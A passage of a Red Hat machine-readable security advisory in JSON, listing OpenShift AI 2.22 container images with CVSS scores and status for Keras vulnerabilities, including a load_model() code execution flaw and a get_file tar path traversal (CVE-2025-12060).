"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Arbitary Code execution in Keras load_model()"
},
{
"cve": "CVE-2025-12060",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-30T18:01:32.193676+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407443"
}
],
"notes": [
{
"category": "description",
"text": "The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Keras Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
